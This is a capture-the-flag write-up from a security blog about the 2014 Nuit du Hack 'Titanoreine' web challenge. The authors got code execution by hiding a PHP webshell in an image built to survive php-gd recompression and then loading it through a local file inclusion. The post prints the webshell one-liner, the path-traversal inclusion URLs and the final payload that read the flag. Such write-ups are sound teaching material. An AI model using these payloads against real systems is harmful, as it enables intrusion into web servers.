Artificial truth

The more you see, the less you believe.

[archives] [latest] | [homepage] | [atom/rss]

Nuit du Hack 2014 Quals - Titanoreine (web 300)
Sun 06 April 2014 — download

Titanoreine was a funny challenge. We were provided a website where we could upload some pictures. There was also an obvious LFI. One may think that you just have to put some php like <?php system($_GET['c']);?> into the metadata field to get code execution. The twist here was that the image was processed by php-gd, trashing our precious metadata.

Notfound, from the hexpresso team reminded me that on eof the organizer was virtualabs. I vaguely remembered that he wrote an article about transofmartions-resistant pictures to get a php shell. He even provides a script to generate the images. What a coincidence.

First we tried to use the system command in our payload, but it seemed that it was not authorised. We switched to eval. By the way, thank you php for providing so many functions to get code execution.

Here is the image that we used, webshelljpg

The payload is roughly equivalent to <?php system($_GET['c']);?>.

Feel free to transform it with php-gd with a quality of 98 (The one used by the chall. By the way, thanks to the teams that used the exploit-98.jpg filename for the hint ;) ) to see our payload with your favorite hex editor.

We lost quite some time trying to get this kind of url working:

http://gallery.nuitduhack.com/index.php?lang=../../../includes/ble.jpg?c=echo 1;

Here is the correct form:

http://gallery.nuitduhack.com/index.php?c=echo 1;lang=../../../includes/ble.jpg

or

http://gallery.nuitduhack.com/index.php?lang=../../../includes/ble.jpg&c=echo 1;

This was the "Omg plz kill me" moment of the ctf.

Anyway, we used glob and file_get_contents to get the flag.

glob

Here is our final payload: http://gallery.nuitduhack.com/index.php?c=echo%20file_get_contents%28%27./includes/X~unsuspicious~X%27%29;&lang=../../../includes/ble.jpg

flag

flag: WhyAreHemorrhoidsNotCalledAssteroids